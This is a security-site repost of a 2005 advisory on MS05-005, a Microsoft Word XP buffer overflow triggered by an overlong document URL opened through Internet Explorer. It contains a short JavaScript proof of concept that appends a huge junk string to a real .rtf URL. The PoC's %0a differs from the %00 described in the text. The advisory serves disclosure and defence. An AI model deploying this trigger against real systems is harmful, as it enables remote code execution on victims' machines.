首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005)
来源:rivgi@finjan.com 作者:Rafel 发布时间:2005-02-17  

Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005)

Summary
A new vulnerability in Microsoft Word XP allows an attacker to launch a buffer overflow attack. This attack could occur when a user opened a Word document using Internet Explorer.

Credit:
The information has been provided by Rafel Ivgi.

Details
When a ".doc" file is opened inside Internet Explorer, Microsoft Word XP "takes over" and opens that doc file. The problem appears when sending a doc file request that contains a null byte (parser) at the end of the doc filename (the rtf extension is also vulnerable).

For Example:
http://example.com/myfile.doc is a valid request.
However the following: http://example.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaa...aa.doc is an invalid request. Such a request will be sent to the server hosting the doc file.

Most servers like IIS and Apache will truncate the characters before the %00 while sending the filename to Internet Explorer. At this stage, Internet Explorer will hand over the string to Microsoft Word XP, which will now receive a long string. This string causes an exploitable buffer overflow, allowing remote code execution.

Proof of Concept Code:
<Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
</script>

Vendor Status:
Microsoft was notified on July 13, 2004.
Microsoft released an advisory and patches to this vulnerability. For further details please refer to:
Vulnerability in Microsoft Office XP could allow Remote Code Execution (MS05-005)



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Armagetron DoS
·3Com FTP Server Buffer Overflo
·Buffer Overflow in OSH
·AWStats PluginMode and LoadPlu
·Linux Kernel <= 2.6.11-rc3
·Sami HTTP Server Directory Tra
·vBulletin 3.x forumdisplay.php
·vbulletin 3.0.x PHP code execu
·TinyWeb Server DoS Exploit
·DoS in Quake 3 poc
·Prozilla Format String Vulnera
·Arkeia 5.3.x Type 77 Request R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved